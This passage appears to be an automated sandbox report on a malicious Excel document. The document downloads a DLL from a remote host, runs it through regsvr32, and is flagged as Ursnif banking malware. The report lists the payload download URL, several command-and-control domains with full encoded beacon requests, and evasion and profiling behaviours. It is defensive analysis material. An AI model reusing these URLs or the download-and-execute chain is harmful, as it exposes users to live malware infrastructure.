Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll

Jump to dropped file

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\SysWOW64\regsvr32.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_00BB4E9C

Anti Debugging:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_67AF1F31 LoadLibraryA,GetProcAddress,

4_2_67AF1F31

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3BFB5 mov eax, dword ptr fs:[00000030h]	4_2_67B3BFB5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3BAF2 push dword ptr fs:[00000030h]	4_2_67B3BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_67B3BEEB mov eax, dword ptr fs:[00000030h]	4_2_67B3BEEB

Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: regsvr32.exe, 00000004.00000002.687856953.0000000002E30000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB3946 cpuid

4_2_00BB3946

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	4_2_67AF1566
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	4_2_67B2F574
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_67B35C41
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	4_2_67B2FBE2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,	4_2_67B2D27D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,	4_2_67B30133

Queries the installation date of Windows

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_67AF17A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

4_2_67AF17A7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_00BB3946 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

4_2_00BB3946

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_67AF146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

4_2_67AF146C

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.390807236.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.2.regsvr32.exe.67af0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.regsvr32.exe.618d29.0.raw.unpack, type: UNPACKEDPE

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.443037975.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442845366.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442945540.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443128050.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443102271.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443066578.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.442605829.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.443010685.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 1040, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.24.47	docs.atu.ngr.mybluehost.me	United States		46606	UNIFIEDLAYER-AS-1US	false
34.86.224.8	app3.maintorna.com	United States		15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
app3.maintorna.com	34.86.224.8	true
chat.billionady.com	34.86.224.8	true
app.buboleinov.com	34.86.224.8	true
docs.atu.ngr.mybluehost.me	162.241.24.47	true
chat.veminiare.com	34.86.224.8	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://docs.atu.ngr.mybluehost.me/presentation.dll	false		high
http://app.buboleinov.com/9v0yu2jY7xyV/b1FQO4_2Bpu/oU2ibFtGutNT_2/BDybIHlLn_2F8TpFqr5X2/irpDvuA9ssjgofrd/4c1VwA_2BbPhSHP/JtDxx0HIWF7ccpVHCr/rPkDzPGSc/uYSPUi7ev1DnwMAe5KYZ/Gp3xLJmh6ETG_2FBMkN/E7fPvyWq8VbZApgZDb6Zoc/Q_2B5FFdwDlGz/OOPdEgA5/KuZ03TAeWnQ8TuTYrWBzpCh/HZ9XO4QjjW/CqnmDoK9QRlDYSYvJ/FQtGoFVns4yC/u0kF3ZfH7vX/MHfLituxTdH5hS/1UdaGiPbq9uDEicbTdsew/7sN4X	false	Avira URL Cloud: safe	unknown
http://chat.veminiare.com/3LFHxcULedfl6vRi2f/7DW3Lbewx/BQzXQE1l6ur2AvUmdOWD/bKkgWqKpyiEbwfjQpgM/vQH_2F_2FVT4APkhQHeL5r/UitKKqshWwy_2/BGH0L4a6/pkZlxCCLsptJgcoJr9UTHwd/Ffy1B0L9r9/Eyyxrmwquwor3qSMh/TBe5k3Obt68k/mJNCVkgWk8D/7yx9L1_2BxLGbp/uEopOUEa1UaIA_2FbaBzA/DPd4NXI0Z4aaUIY_/2BCwd5luDmdcULL/gWZXR8amBs_2Bdba4m/y_2FNHAH5/8r0gOR08HJF6YSW4fPnv/pO6q_2Bxl8Zmi6rf2mr/5MzgQcGiWowQQeHDILIXCa/Ln	false	Avira URL Cloud: safe	unknown
http://chat.billionady.com/6pQ2A_2F2B3uIfC5gf/_2FhwtDCH/73_2BQ_2BuzT9wYw8ZBA/CtDYBpMjmIzd4NANr9h/E_2BV0SsS_2FE5aeMX1xgh/NZq_2FWoEox0m/1PODYUaT/NQ2cpVElyM7Xu6KIKpsyFvG/B_2BqGxJnN/2dJtt0U587Lg0hYu1/sn5rm17uvS_2/FSnbx1glCyi/Dccdos_2B6Zr6y/J66yl83piVRuKEegL7hvJ/wSN_2FkghPvIWS2b/dNNXKyb_2FwEpQo/6heBhUKqFR_2BfxaOL/CWnJM0msX/t7S7YE6CyJwVuKH5zkij/QhpyHfh3tCqTr5UZqei/wkeRPNzr/SJP	false	Avira URL Cloud: safe	unknown
http://app.buboleinov.com/eZG8I16LYY6RQIy/fhCGljC_2FGvNP1fHp/pp7vitMvb/J_2BJIUyGHNqNDnXVsuN/Dv3DXf5iFChU433fFbO/cDNqIWEud5hIofjPLbzDiL/mvTJAEZe_2B8n/HOY_2BNn/Mwl4PuZbr98bXlg5umHHmqo/MfccYXgKbn/EB6DVkj22BI8iPLRL/0BMvppaqZnA1/ltGjCcB3Qq_/2Bf9hop2VhIWRy/FnUIqjkgdHWzn_2FvGT_2/BBOAGxHvl0zgZKxj/wWDgg8kJ81PEW_2/BxYtpnd1YZW_2FsGmO/XTHEj72q_/2Fq_2BcpSuAkpIBrcz7B/nlLQMY665CUBQPVFj3V/qV9UsTYut/AnDN	false	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 4.2.regsvr32.exe.46194a0.2.raw.unpack

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_00BB35A1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source:

Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll.0.dr

Source: C:\Windows\SysWOW64\regsvr32.exe

4_2_00BB4E9C

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\presentation[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\Public\block.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: presentation[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Networking:

Downloads executable code via HTTP

Source: global traffic

Source: global traffic	HTTP traffic detected: GET /presentation.dll HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: docs.atu.ngr.mybluehost.meConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /9v0yu2jY7xyV/b1FQO4_2Bpu/oU2ibFtGutNT_2/BDybIHlLn_2F8TpFqr5X2/irpDvuA9ssjgofrd/4c1VwA_2BbPhSHP/JtDxx0HIWF7ccpVHCr/rPkDzPGSc/uYSPUi7ev1DnwMAe5KYZ/Gp3xLJmh6ETG_2FBMkN/E7fPvyWq8VbZApgZDb6Zoc/Q_2B5FFdwDlGz/OOPdEgA5/KuZ03TAeWnQ8TuTYrWBzpCh/HZ9XO4QjjW/CqnmDoK9QRlDYSYvJ/FQtGoFVns4yC/u0kF3ZfH7vX/MHfLituxTdH5hS/1UdaGiPbq9uDEicbTdsew/7sN4X HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /6pQ2A_2F2B3uIfC5gf/_2FhwtDCH/73_2BQ_2BuzT9wYw8ZBA/CtDYBpMjmIzd4NANr9h/E_2BV0SsS_2FE5aeMX1xgh/NZq_2FWoEox0m/1PODYUaT/NQ2cpVElyM7Xu6KIKpsyFvG/B_2BqGxJnN/2dJtt0U587Lg0hYu1/sn5rm17uvS_2/FSnbx1glCyi/Dccdos_2B6Zr6y/J66yl83piVRuKEegL7hvJ/wSN_2FkghPvIWS2b/dNNXKyb_2FwEpQo/6heBhUKqFR_2BfxaOL/CWnJM0msX/t7S7YE6CyJwVuKH5zkij/QhpyHfh3tCqTr5UZqei/wkeRPNzr/SJP HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: chat.billionady.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /2NycgEUCU9aFB9EW/oYWq0ZxfG4Rwlla/DVHHJKmiaah_2Fc00M/sq13SA7xg/8iyktPbgAp05En4Ey1CY/kqZ7yrPVavEfwrp_2Bj/lR9RWtjlXq0cRNIy_2F60o/lSzY3HE8sRHUM/Gmj_2FCn/uIce1p1HXF5VL_2B2XdUoWC/0FWxUtGgoe/_2FtabDk_2Fjn_2B4/RA9Czz9AhUGX/udDMzbuC4Rg/qCC85CWCCm4L8G/K_2BwcLiGvh5lIZwjZ_2F/b5OeSUXGe4Di3gUA/5zgIzjMm4PmTEiN/WPUcUTj_2FhdF2kJij/C0SngaUJJ/pSANnjSkZUqo1FAOuoqb/ZSUlY4pVLEH/22gzP HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app3.maintorna.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /eZG8I16LYY6RQIy/fhCGljC_2FGvNP1fHp/pp7vitMvb/J_2BJIUyGHNqNDnXVsuN/Dv3DXf5iFChU433fFbO/cDNqIWEud5hIofjPLbzDiL/mvTJAEZe_2B8n/HOY_2BNn/Mwl4PuZbr98bXlg5umHHmqo/MfccYXgKbn/EB6DVkj22BI8iPLRL/0BMvppaqZnA1/ltGjCcB3Qq_/2Bf9hop2VhIWRy/FnUIqjkgdHWzn_2FvGT_2/BBOAGxHvl0zgZKxj/wWDgg8kJ81PEW_2/BxYtpnd1YZW_2FsGmO/XTHEj72q_/2Fq_2BcpSuAkpIBrcz7B/nlLQMY665CUBQPVFj3V/qV9UsTYut/AnDN HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /3LFHxcULedfl6vRi2f/7DW3Lbewx/BQzXQE1l6ur2AvUmdOWD/bKkgWqKpyiEbwfjQpgM/vQH_2F_2FVT4APkhQHeL5r/UitKKqshWwy_2/BGH0L4a6/pkZlxCCLsptJgcoJr9UTHwd/Ffy1B0L9r9/Eyyxrmwquwor3qSMh/TBe5k3Obt68k/mJNCVkgWk8D/7yx9L1_2BxLGbp/uEopOUEa1UaIA_2FbaBzA/DPd4NXI0Z4aaUIY_/2BCwd5luDmdcULL/gWZXR8amBs_2Bdba4m/y_2FNHAH5/8r0gOR08HJF6YSW4fPnv/pO6q_2Bxl8Zmi6rf2mr/5MzgQcGiWowQQeHDILIXCa/Ln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:86.0) Gecko/20100101 Firefox/86.0Host: chat.veminiare.com

Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3812dc88,0x01d7407a</date><accdate>0x3812dc88,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x3812dc88,0x01d7407a</date><accdate>0x3812dc88,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x3817a180,0x01d7407a</date><accdate>0x3817a180,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x3817a180,0x01d7407a</date><accdate>0x3817a180,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x381a0388,0x01d7407a</date><accdate>0x381a0388,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.15.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x381a0388,0x01d7407a</date><accdate>0x381a0388,0x01d7407a</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: docs.atu.ngr.mybluehost.me

Source: global traffic

Source: {61E1F67C-AC6D-11EB-90E5-ECF4BB2D2496}.dat.15.dr	String found in binary or memory: http://app.buboleinov.com/9v0yu2jY7xyV/b1FQO4_2Bpu/oU2ibFtGutNT_2/BDybIHlLn_2F8TpFqr5X2/irpDvuA9ssjg
Source: {9B5A9DDA-AC6D-11EB-90E5-ECF4BB2D2496}.dat.34.dr, ~DF0F9DAFE54CC87186.TMP.34.dr	String found in binary or memory: http://app.buboleinov.com/eZG8I16LYY6RQIy/fhCGljC_2FGvNP1fHp/pp7vitMvb/J_2BJIUyGHNqNDnXVsuN/Dv3DXf5i
Source: {8D1871FD-AC6D-11EB-90E5-ECF4BB2D2496}.dat.32.dr, ~DFF7BA5DE226E46A61.TMP.32.dr	String found in binary or memory: http://app3.maintorna.com/2NycgEUCU9aFB9EW/oYWq0ZxfG4Rwlla/DVHHJKmiaah_2Fc00M/sq13SA7xg/8iyktPbgAp05
Source: {7CFE4BA2-AC6D-11EB-90E5-ECF4BB2D2496}.dat.27.dr, ~DF6C0FD439615FE33F.TMP.27.dr	String found in binary or memory: http://chat.billionady.com/6pQ2A_2F2B3uIfC5gf/_2FhwtDCH/73_2BQ_2BuzT9wYw8ZBA/CtDYBpMjmIzd4NANr9h/E_2
Source: sharedStrings.bin	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dll
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: msapplication.xml.15.dr	String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.15.dr	String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.15.dr	String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.15.dr	String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.15.dr	String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.15.dr	String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.15.dr	String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.15.dr	String found in binary or memory: http://www.youtube.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.cortana.ai
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.office.net
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.onedrive.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://augloop.office.com
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.entity.
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: DFB7A469-C2BA-4377-83DE-2A2821BDEB41.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
